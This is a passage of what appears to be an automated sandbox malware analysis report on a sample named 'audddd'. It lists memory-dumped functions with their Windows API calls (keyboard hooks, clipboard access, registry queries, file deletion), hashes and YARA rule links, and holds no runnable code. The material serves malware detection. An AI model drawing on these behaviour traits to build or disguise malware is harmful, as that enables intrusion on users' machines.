Opcode Fuzzy Hash: 5babd18166de8614292acc1d801cdf2448cbc7d786a17319c3ca14f36598e7f9
Instruction Fuzzy Hash: 4B5113B0E002198FDB15CFA9C884BDEBBB5AF48318F14842AE819AB350DB749845CF95

Uniqueness

Uniqueness Score: -1.00%

Function 0639CF08 Relevance: 1.6, APIs: 1, Instructions: 128COMMON

Download Yara Rule

APIs

GetVolumeInformationA.KERNEL32(?,?,?,?,?,?,?,?), ref: 0639D004

Memory Dump Source

Source File: 00000012.00000002.1132359098.0000000006390000.00000040.00000800.00020000.00000000.sdmp, Offset: 06390000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_6390000_audddd.jbxd

Similarity

API ID: InformationVolume
String ID:
API String ID: 2039140958-0
Opcode ID: e51b36bb8c7827efc70008049a2461ed715ac7e2b601b92e186a670c143edbdc
Instruction ID: 97646c10d499b55c5a183ba24f2ea50b78a1465d3754ab1d1945fa519bbe0f18
Opcode Fuzzy Hash: e51b36bb8c7827efc70008049a2461ed715ac7e2b601b92e186a670c143edbdc
Instruction Fuzzy Hash: 8F51AEB0D002489FDF54CF99CA84BCDBBF5BF48314F60852AE408AB265D775A949CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 06976280 Relevance: 1.6, APIs: 1, Instructions: 117libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 06976380

Memory Dump Source

Source File: 00000012.00000002.1132647461.0000000006970000.00000040.00000800.00020000.00000000.sdmp, Offset: 06970000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_6970000_audddd.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 11cdc033258e7e5e413c30a71dc1e87825d54887fbe50d576fa31f70dbabff46
Instruction ID: 9c5764cda3b544d64683fa0e1faa48b9237300a577fcb771e963527afec78902
Opcode Fuzzy Hash: 11cdc033258e7e5e413c30a71dc1e87825d54887fbe50d576fa31f70dbabff46
Instruction Fuzzy Hash: 75413170E00A14CFC768EF34D9A066E76F6FF85340B24892ED916CB655D732A941DF80

Uniqueness

Uniqueness Score: -1.00%

Function 02EBD59C Relevance: 1.6, APIs: 1, Instructions: 116COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 02EBE90A

Memory Dump Source

Source File: 00000012.00000002.1129943300.0000000002EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_2eb0000_audddd.jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: 5b610f5ef393a61e87a8244835b47bbd3ca2b33d6001604f056a914fca9c3084
Instruction ID: 0265acc9aa3b1c0dae21a03684fecfb8847091d950ec2a1df5a4b22500fe8148
Opcode Fuzzy Hash: 5b610f5ef393a61e87a8244835b47bbd3ca2b33d6001604f056a914fca9c3084
Instruction Fuzzy Hash: E051B0B1D003099FDF15CF9AC984ADEBBB5FF88314F64816AE819AB210D7749945CF90

Uniqueness

Uniqueness Score: -1.00%

Function 0639E580 Relevance: 1.6, APIs: 1, Instructions: 107registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 0639E669

Memory Dump Source

Source File: 00000012.00000002.1132359098.0000000006390000.00000040.00000800.00020000.00000000.sdmp, Offset: 06390000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_6390000_audddd.jbxd

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: 57afe721b715a9a9d41da05bd8cc132abc12dca1f9c347470eeca38f43f4fa5f
Instruction ID: 9dd5f8e67da230312da6e1db16baf35489aa2fbc25f5032523ebb38c051fee06
Opcode Fuzzy Hash: 57afe721b715a9a9d41da05bd8cc132abc12dca1f9c347470eeca38f43f4fa5f
Instruction Fuzzy Hash: C24138B1D053899FCB21CFA9C880ACEBFF4AF49310F25815AE858AB251D7349845CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 07136AA4 Relevance: 1.6, APIs: 1, Instructions: 106libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 07136AC7

Memory Dump Source

Source File: 00000012.00000002.1133284280.0000000007130000.00000040.00000800.00020000.00000000.sdmp, Offset: 07130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_7130000_audddd.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 97cea590cf959c61b188c6e2716bbe175b076d3a7a614c963cb22e4fe2c58fed
Instruction ID: 49f408ae8302fe7139e077ee49e90d4586a174a6769858454bfa67d8313d2833
Opcode Fuzzy Hash: 97cea590cf959c61b188c6e2716bbe175b076d3a7a614c963cb22e4fe2c58fed
Instruction Fuzzy Hash: 36417C347002169FCB54AB24C89476DB6F6FF84605F1484A9E40EE7784DF348E81CF91

Uniqueness

Uniqueness Score: -1.00%

Function 07136A9B Relevance: 1.6, APIs: 1, Instructions: 101libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 07136AC7

Memory Dump Source

Source File: 00000012.00000002.1133284280.0000000007130000.00000040.00000800.00020000.00000000.sdmp, Offset: 07130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_7130000_audddd.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 8cd01536ecf8f57a518d07d625f0423e05325836d702a006d4b6372f7bb227d2
Instruction ID: 9b8a8392341edad9e6300b4ebe189e15cc7887937adadf687921ae865d5244d8
Opcode Fuzzy Hash: 8cd01536ecf8f57a518d07d625f0423e05325836d702a006d4b6372f7bb227d2
Instruction Fuzzy Hash: DC31AD707002169FDB589B24C89476EB6F6FF84605F1484A9E40AE7388DF34CE82CF81

Uniqueness

Uniqueness Score: -1.00%

Function 06972014 Relevance: 1.6, APIs: 1, Instructions: 97COMMON

Download Yara Rule

APIs

CallWindowProcW.USER32(?,?,?,?,?), ref: 06973411

Memory Dump Source

Source File: 00000012.00000002.1132647461.0000000006970000.00000040.00000800.00020000.00000000.sdmp, Offset: 06970000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_6970000_audddd.jbxd

Similarity

API ID: CallProcWindow
String ID:
API String ID: 2714655100-0
Opcode ID: 2820a74238a6ff97666e54cd721b1dcd5afc7b0090d52f2262aac52b4265c486
Instruction ID: 15d8261161e3dbd81be7b3ea3dc90a855181d918bd511d9f8d96b5ee87a20e02
Opcode Fuzzy Hash: 2820a74238a6ff97666e54cd721b1dcd5afc7b0090d52f2262aac52b4265c486
Instruction Fuzzy Hash: 41414BB5900305CFDB64CF99C888AAABBF5FF88314F24C459E419AB761D771A841DFA0

Uniqueness

Uniqueness Score: -1.00%

Function 063999D4 Relevance: 1.6, APIs: 1, Instructions: 88registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 0639E669

Memory Dump Source

Source File: 00000012.00000002.1132359098.0000000006390000.00000040.00000800.00020000.00000000.sdmp, Offset: 06390000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_6390000_audddd.jbxd

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: 9324522cd54cbba807152e097deaa09783fb58daff97e4bb2f319852327af592
Instruction ID: 937f62cb68cc7822b5b1b24cc8749a5f488f113b788b161707d8d3a7cd953281
Opcode Fuzzy Hash: 9324522cd54cbba807152e097deaa09783fb58daff97e4bb2f319852327af592
Instruction Fuzzy Hash: EF31E2B1D00259DFCB64CF9AC984A9EBFF5AF48714F14802AE918AB350D774A945CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 07120006 Relevance: 1.6, APIs: 1, Instructions: 87COMMON

Download Yara Rule

APIs

SetWindowsHookExW.USER32(?,00000000,?,?), ref: 071200BB

Memory Dump Source

Source File: 00000012.00000002.1133263261.0000000007120000.00000040.00000800.00020000.00000000.sdmp, Offset: 07120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_7120000_audddd.jbxd

Similarity

API ID: HookWindows
String ID:
API String ID: 2559412058-0
Opcode ID: 62a8a5a043037de6dc277b3d69368bc46289529f57f3aadc5cbc19b097bb9faa
Instruction ID: 997d7d45604d6be9e6cd3b4089cd9bd24de5fe4733da8a1b5a247f79f29cac64
Opcode Fuzzy Hash: 62a8a5a043037de6dc277b3d69368bc46289529f57f3aadc5cbc19b097bb9faa
Instruction Fuzzy Hash: 74319F7180438A9FCB12CFA9C9546DEFFF5EF4A320F18849AD094AB252C7785845CF61

Uniqueness

Uniqueness Score: -1.00%

Function 0639F8DF Relevance: 1.6, APIs: 1, Instructions: 76comclipboardCOMMON

Download Yara Rule

APIs

OleGetClipboard.OLE32(?), ref: 0639F970

Memory Dump Source

Source File: 00000012.00000002.1132359098.0000000006390000.00000040.00000800.00020000.00000000.sdmp, Offset: 06390000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_6390000_audddd.jbxd

Similarity

API ID: Clipboard
String ID:
API String ID: 220874293-0
Opcode ID: ad6352508d7b5906e6f15a89b69ed40a3f60ee4d6633cb9c9fb2d2557813c4d2
Instruction ID: 4aa6fda3cbf1a81f0f96ef23820ae64931a1da4a1a8e6c48c59ec148336d02ec
Opcode Fuzzy Hash: ad6352508d7b5906e6f15a89b69ed40a3f60ee4d6633cb9c9fb2d2557813c4d2
Instruction Fuzzy Hash: F83103B0D01349EFDB54CF99C984BDEBBF5AF48314F24841AE408AB290D774A949CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 0639F8E8 Relevance: 1.6, APIs: 1, Instructions: 71comclipboardCOMMON

Download Yara Rule

APIs

OleGetClipboard.OLE32(?), ref: 0639F970

Memory Dump Source

Source File: 00000012.00000002.1132359098.0000000006390000.00000040.00000800.00020000.00000000.sdmp, Offset: 06390000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_6390000_audddd.jbxd

Similarity

API ID: Clipboard
String ID:
API String ID: 220874293-0
Opcode ID: 609e2d350d82d26687d4fb3a74e41263fad875afa97fa44b642f8420649d1524
Instruction ID: 302e636c41575b6f711c6ab19c45aa9b1e151fc0fb64d503085c577b8793780f
Opcode Fuzzy Hash: 609e2d350d82d26687d4fb3a74e41263fad875afa97fa44b642f8420649d1524
Instruction Fuzzy Hash: CB31D2B0D01248EFDB54CF99C984BDEBBF5AF48314F24801AE404AB290D774A949CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 06972518 Relevance: 1.6, APIs: 1, Instructions: 66COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,069724E6,?,?,?,?,?), ref: 069725A7

Memory Dump Source

Source File: 00000012.00000002.1132647461.0000000006970000.00000040.00000800.00020000.00000000.sdmp, Offset: 06970000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_6970000_audddd.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: d661b968b701060693908884109af11635d4c4ab7372502ee2cbc89f34e45818
Instruction ID: 9263e841f78e178b762b95107e2b1b0ffaea63620eafbb9998dd6e18010ad425
Opcode Fuzzy Hash: d661b968b701060693908884109af11635d4c4ab7372502ee2cbc89f34e45818
Instruction Fuzzy Hash: 962107B5D11249AFDB10CF9AD984ADEBFF8EB48320F14841AE814A3210D374AA54CF65

Uniqueness

Uniqueness Score: -1.00%

Function 06971EB0 Relevance: 1.6, APIs: 1, Instructions: 65COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,069724E6,?,?,?,?,?), ref: 069725A7

Memory Dump Source

Source File: 00000012.00000002.1132647461.0000000006970000.00000040.00000800.00020000.00000000.sdmp, Offset: 06970000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_6970000_audddd.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: c6b6de263c2dc12544ac23dcb9b502a706724e31eb5dea9196a82b2b3abdc828
Instruction ID: 012e6416a84c6b5974603ed895912b291358e79977706eff9ca9557e3942b030
Opcode Fuzzy Hash: c6b6de263c2dc12544ac23dcb9b502a706724e31eb5dea9196a82b2b3abdc828
Instruction Fuzzy Hash: B42116B59103089FDB10CF9AD984ADEBFF8EB48320F14841AE914E3310D374AA50CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 02EB3F47 Relevance: 1.6, APIs: 1, Instructions: 60COMMON

Download Yara Rule

APIs

RtlEncodePointer.NTDLL(00000000), ref: 02EB3FD2

Memory Dump Source

Source File: 00000012.00000002.1129943300.0000000002EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_2eb0000_audddd.jbxd

Similarity

API ID: EncodePointer
String ID:
API String ID: 2118026453-0
Opcode ID: 2c2800c570bbab7ac5c09619c9c6e9eae21425240657fe2f126b01744842bbb9
Instruction ID: 4e3c150db5c27a9b6d316562d653028972df7aa331678a7f4735321611ab940d
Opcode Fuzzy Hash: 2c2800c570bbab7ac5c09619c9c6e9eae21425240657fe2f126b01744842bbb9
Instruction Fuzzy Hash: 7E2168B19403098FCB60CF9AD94D7DABBF4FB49318F24D169E408A2240D738A544CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 069771D3 Relevance: 1.6, APIs: 1, Instructions: 57fileCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNEL32(00000000), ref: 06977248

Memory Dump Source

Source File: 00000012.00000002.1132647461.0000000006970000.00000040.00000800.00020000.00000000.sdmp, Offset: 06970000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_6970000_audddd.jbxd

Similarity

API ID: DeleteFile
String ID:
API String ID: 4033686569-0
Opcode ID: 9201bcb8dfb30efc7670146bdf2c1f369cb6b62aab6fb0dd91df6c470635c45a
Instruction ID: 65ca5fbb87fb3de75b3a529f2ae0cb647888e287fcf866d6caf8a83b64b1246a
Opcode Fuzzy Hash: 9201bcb8dfb30efc7670146bdf2c1f369cb6b62aab6fb0dd91df6c470635c45a
Instruction Fuzzy Hash: 3D214AB1C0061A9FCB50CF9AD9447DEFBF4EF48320F14815AE818A7640D338A945CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 07120040 Relevance: 1.6, APIs: 1, Instructions: 57COMMON

Download Yara Rule

APIs

SetWindowsHookExW.USER32(?,00000000,?,?), ref: 071200BB

Memory Dump Source

Source File: 00000012.00000002.1133263261.0000000007120000.00000040.00000800.00020000.00000000.sdmp, Offset: 07120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_7120000_audddd.jbxd

Similarity

API ID: HookWindows
String ID:
API String ID: 2559412058-0
Opcode ID: 8fdcd4668704e130e017626086c7ef23a57a1429db0720a3c4c8ee3e75c9a0a3
Instruction ID: ca353114009e6b7e85d0364b9ca5232aeb0c7170c8980fd6ffeed766c135e1c0
Opcode Fuzzy Hash: 8fdcd4668704e130e017626086c7ef23a57a1429db0720a3c4c8ee3e75c9a0a3
Instruction Fuzzy Hash: D32124B1D002199FCB14CF9AC944BEEFBF5EB88320F10842AE419A7250D775A945CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 069771D8 Relevance: 1.6, APIs: 1, Instructions: 56fileCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNEL32(00000000), ref: 06977248

Memory Dump Source

Source File: 00000012.00000002.1132647461.0000000006970000.00000040.00000800.00020000.00000000.sdmp, Offset: 06970000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_6970000_audddd.jbxd

Similarity

API ID: DeleteFile
String ID:
API String ID: 4033686569-0
Opcode ID: 6396a422407fcc69e8c017ce1ff9c338108889ddcc6bcec1949cbf22063f745c
Instruction ID: fd1675a9a7987ec2f71dbcba83fad0fcde24c402340432ac3d362137f32e5e22
Opcode Fuzzy Hash: 6396a422407fcc69e8c017ce1ff9c338108889ddcc6bcec1949cbf22063f745c
Instruction Fuzzy Hash: EC1159B1C0061A9FCB10CF9AD9447DEFBF4EF48320F14816AE828A7640D338A945CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 0712A03C Relevance: 1.6, APIs: 1, Instructions: 56COMMON

Download Yara Rule

APIs

SetWindowTextW.USER32(?,00000000,?,?,?,?,?,0712DB61,?,00000000), ref: 0712E0CA

Memory Dump Source

Source File: 00000012.00000002.1133263261.0000000007120000.00000040.00000800.00020000.00000000.sdmp, Offset: 07120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_7120000_audddd.jbxd

Similarity

API ID: TextWindow
String ID:
API String ID: 530164218-0
Opcode ID: 32dd07cd118ac1417dd66b56b4d49f810552c8aa33c6cd9bc91dc8ccf23202bc
Instruction ID: 6b679ef9dfbe772a0536ce016b39de5762f7f6ccac60cd96035b61e1f63239ce
Opcode Fuzzy Hash: 32dd07cd118ac1417dd66b56b4d49f810552c8aa33c6cd9bc91dc8ccf23202bc
Instruction Fuzzy Hash: 21211AB19003199FDB24CF9AC444BDEFBF4EB89310F14842AE869A7250D374A55ACFA5

Uniqueness

Uniqueness Score: -1.00%

Function 07127320 Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,?,?,00000000,?,07127301,00000800), ref: 07127392

Memory Dump Source

Source File: 00000012.00000002.1133263261.0000000007120000.00000040.00000800.00020000.00000000.sdmp, Offset: 07120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_7120000_audddd.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 604385f3897fe24925d812c7a2ca81d52869d5af7657d6eb6f605149c3e57ae3
Instruction ID: 47be7474fb9c190b481f0ae197f29fb6e689a8d7e81134cdb97a0281301bd3f9
Opcode Fuzzy Hash: 604385f3897fe24925d812c7a2ca81d52869d5af7657d6eb6f605149c3e57ae3
Instruction Fuzzy Hash: 461133B2C002499FCB11CF9AD844ADEFBF4AF88320F10846AE819A7250C374A585CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 0712A2F0 Relevance: 1.6, APIs: 1, Instructions: 55windowCOMMON

Download Yara Rule

APIs

PeekMessageW.USER32(?,?,00000000,00000000,00000000,?,?,?,?,0712B47A,00000000,00000000,03FF4194,0302B7E8), ref: 0712B8C8

Memory Dump Source

Source File: 00000012.00000002.1133263261.0000000007120000.00000040.00000800.00020000.00000000.sdmp, Offset: 07120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_7120000_audddd.jbxd

Similarity

API ID: MessagePeek
String ID:
API String ID: 2222842502-0
Opcode ID: 9cdf45ccf76172d3eb39bd2c8ba812f19f39cb94320b630f7c595845421d4930
Instruction ID: 16db2c9485a2838d7763b2d828de4f985a58baf2fccd70a99e1458b81bacd3dc
Opcode Fuzzy Hash: 9cdf45ccf76172d3eb39bd2c8ba812f19f39cb94320b630f7c595845421d4930
Instruction Fuzzy Hash: 55113AB1C0431D9FCB10CF9AD984BDEBBF8EB48320F10842AE418A7250D374A555DFA5

Uniqueness

Uniqueness Score: -1.00%

Function 0712E059 Relevance: 1.6, APIs: 1, Instructions: 55COMMON

Download Yara Rule

APIs

SetWindowTextW.USER32(?,00000000,?,?,?,?,?,0712DB61,?,00000000), ref: 0712E0CA

Memory Dump Source

Source File: 00000012.00000002.1133263261.0000000007120000.00000040.00000800.00020000.00000000.sdmp, Offset: 07120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_7120000_audddd.jbxd

Similarity

API ID: TextWindow
String ID:
API String ID: 530164218-0
Opcode ID: 0ef5c62530ff397ee508c1b361c91c270d680797ab657635f926bf601011cafb
Instruction ID: f6c52a3a81f78077fb8615582bba148d484b5998c2a1ef59be3dc31cc066fbc9
Opcode Fuzzy Hash: 0ef5c62530ff397ee508c1b361c91c270d680797ab657635f926bf601011cafb
Instruction Fuzzy Hash: EF111AB59002499FDB14CF9AD844BDEBBF4EF88310F14841AD454A7250D334A54ACF65

Uniqueness

Uniqueness Score: -1.00%

Function 071260A4 Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,?,?,00000000,?,07127301,00000800), ref: 07127392

Memory Dump Source

Source File: 00000012.00000002.1133263261.0000000007120000.00000040.00000800.00020000.00000000.sdmp, Offset: 07120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_7120000_audddd.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: f9d23859dfa111f08999b7b162fd066eeed41e1a873c8ace577827ddc852f0cd
Instruction ID: 7645f8f4c555f85d291d5a68061083b1bd16e426257ed0b363323b01dfbddec8
Opcode Fuzzy Hash: f9d23859dfa111f08999b7b162fd066eeed41e1a873c8ace577827ddc852f0cd
Instruction Fuzzy Hash: AB1117B28043599FCB14CF9AC444ADEFBF4EB88320F10842AE915A7250C374A555CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 0712B85A Relevance: 1.6, APIs: 1, Instructions: 55windowCOMMON

Download Yara Rule

APIs

PeekMessageW.USER32(?,?,00000000,00000000,00000000,?,?,?,?,0712B47A,00000000,00000000,03FF4194,0302B7E8), ref: 0712B8C8

Memory Dump Source

Source File: 00000012.00000002.1133263261.0000000007120000.00000040.00000800.00020000.00000000.sdmp, Offset: 07120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_7120000_audddd.jbxd

Similarity

API ID: MessagePeek
String ID:
API String ID: 2222842502-0
Opcode ID: 72e4944ff63e36dd3162280a5cf6317e7d8e3a5e9cdf04193fcffa5530ce2b99
Instruction ID: 5c09f5b8570a8b34f697b18af4032b5b5c25a8b73a02c06fc285150b4ab3086d
Opcode Fuzzy Hash: 72e4944ff63e36dd3162280a5cf6317e7d8e3a5e9cdf04193fcffa5530ce2b99
Instruction Fuzzy Hash: A1211AB18002499FDB10CF9AD944BDEFBF4EB48310F14842AE458A7250D374A555DFA5

Uniqueness

Uniqueness Score: -1.00%

Function 02EB3F58 Relevance: 1.6, APIs: 1, Instructions: 54COMMON

Download Yara Rule

APIs

RtlEncodePointer.NTDLL(00000000), ref: 02EB3FD2

Memory Dump Source

Source File: 00000012.00000002.1129943300.0000000002EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_2eb0000_audddd.jbxd

Similarity

API ID: EncodePointer
String ID:
API String ID: 2118026453-0
Opcode ID: 0cfec408697ba1a0dcdaabd3469d179600a48478f28930410239cc2634dc064e
Instruction ID: ad8a09019c8e419e97557414203698c2dd270a13d25ea90746acc069b729ee24
Opcode Fuzzy Hash: 0cfec408697ba1a0dcdaabd3469d179600a48478f28930410239cc2634dc064e
Instruction Fuzzy Hash: 7D1156B09003098FDB60CFAAD9497DEBFF8EB49314F24C06AE409A3641D739A544CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 0639B41E Relevance: 1.6, APIs: 1, Instructions: 53libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0639B45F

Memory Dump Source

Source File: 00000012.00000002.1132359098.0000000006390000.00000040.00000800.00020000.00000000.sdmp, Offset: 06390000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_6390000_audddd.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 9bc74df702b8a0b00d69d14588f3dec6b40800bd35a9604428e6d64921243fec
Instruction ID: a4a3c3990925b116d61adf2a88c7e32eae1f7ff646c399e5fefebf20c0eb7afc
Opcode Fuzzy Hash: 9bc74df702b8a0b00d69d14588f3dec6b40800bd35a9604428e6d64921243fec
Instruction Fuzzy Hash: 79114C30911209DFCF58EF65E494A9FFBB6FF84300F108529E4026B255CB35A845CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 02EBD348 Relevance: 1.6, APIs: 1, Instructions: 51COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000), ref: 02EBD3B6

Memory Dump Source

Source File: 00000012.00000002.1129943300.0000000002EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_2eb0000_audddd.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 943603c09f18c8d3d49816827ed423846025b3b47aaceb34e45749597781fb7d
Instruction ID: 615ea30c4b410527cd476c7f8d6a4d1fd2780c9e0c46ce47ae2a7b8253daf092
Opcode Fuzzy Hash: 943603c09f18c8d3d49816827ed423846025b3b47aaceb34e45749597781fb7d
Instruction Fuzzy Hash: E61123B58007098FCB24DF9AC844ADEFBF4EF88314F14846AD419A7610D374A545CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 02EBC564 Relevance: 1.6, APIs: 1, Instructions: 50COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000), ref: 02EBD3B6

Memory Dump Source

Source File: 00000012.00000002.1129943300.0000000002EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_2eb0000_audddd.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: aa44dde1c739e8a45f62530bbe3a50b3fbd340a801f5a83b8be8aaba3a08b993
Instruction ID: 62e4920ea0e237041e855976e1b50a27c8bc63518c0e1d5bf607f880c5be6b1e
Opcode Fuzzy Hash: aa44dde1c739e8a45f62530bbe3a50b3fbd340a801f5a83b8be8aaba3a08b993
Instruction Fuzzy Hash: D311F0B68003098FCB24DF9AC844BDEBBF4EF89224F14846AD429B7211D374A545CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 0639EF83 Relevance: 1.6, APIs: 1, Instructions: 50COMMON

Download Yara Rule

APIs

KiUserCallbackDispatcher.NTDLL(00000000,?,?,?,?,?,?,?,?,0639EF57), ref: 0639EFE7

Memory Dump Source

Source File: 00000012.00000002.1132359098.0000000006390000.00000040.00000800.00020000.00000000.sdmp, Offset: 06390000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_6390000_audddd.jbxd

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: 91ea21ee7401bad53063d7ae50ebb936a0ee1af4b16ce12935c994ce97b0bab3
Instruction ID: c30a02fb83eea925ade09710141903b65031eaaa0b03029e60163a09d2e842a5
Opcode Fuzzy Hash: 91ea21ee7401bad53063d7ae50ebb936a0ee1af4b16ce12935c994ce97b0bab3
Instruction Fuzzy Hash: 7A1128B58003498FCB10DFAAD944BDEFFF8AF89324F24845AE419A7610C775A584CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 0712C04C Relevance: 1.6, APIs: 1, Instructions: 50windowCOMMON

Download Yara Rule

APIs

SendMessageA.USER32(017C4708,0000040A,?,?), ref: 0712EA58

Memory Dump Source

Source File: 00000012.00000002.1133263261.0000000007120000.00000040.00000800.00020000.00000000.sdmp, Offset: 07120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_7120000_audddd.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: aa25a87d2ffae479c78363b4498bd30328e78dc8b2763d9d96413b9a079330ae
Instruction ID: 9b2187f6dec93b702af2d23d47a43dc84a7d9622fb6ed8c9d508606928d25d35
Opcode Fuzzy Hash: aa25a87d2ffae479c78363b4498bd30328e78dc8b2763d9d96413b9a079330ae
Instruction Fuzzy Hash: 571116B19002199FCB50DF9AD984BDEFFF8FB89320F208419E519A7250C375A954CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 0639DFAC Relevance: 1.5, APIs: 1, Instructions: 49COMMON

Download Yara Rule

APIs

KiUserCallbackDispatcher.NTDLL(00000000,?,?,?,?,?,?,?,?,0639EF57), ref: 0639EFE7

Memory Dump Source

Source File: 00000012.00000002.1132359098.0000000006390000.00000040.00000800.00020000.00000000.sdmp, Offset: 06390000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_6390000_audddd.jbxd

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: 9b988978093fce4ae4a371021759100b40ebc46492fd33ea67f306dc19a92699
Instruction ID: 9dc8d8aab5b41cb7c39da287ab35ba844a6d4c97db345ec7e9c7f55416368e04
Opcode Fuzzy Hash: 9b988978093fce4ae4a371021759100b40ebc46492fd33ea67f306dc19a92699
Instruction Fuzzy Hash: 2B1125B18003498FCB50DF9AD984BDEFBF8EF88324F20845AE419A7650C775A944CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 069781D8 Relevance: 1.5, APIs: 1, Instructions: 49timeCOMMON

Download Yara Rule

APIs

SetTimer.USER32(?,054E6408,?,?,?,?,?,?,069780A8,00000000,00000000,?), ref: 0697823D

Memory Dump Source

Source File: 00000012.00000002.1132647461.0000000006970000.00000040.00000800.00020000.00000000.sdmp, Offset: 06970000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_6970000_audddd.jbxd

Similarity

API ID: Timer
String ID:
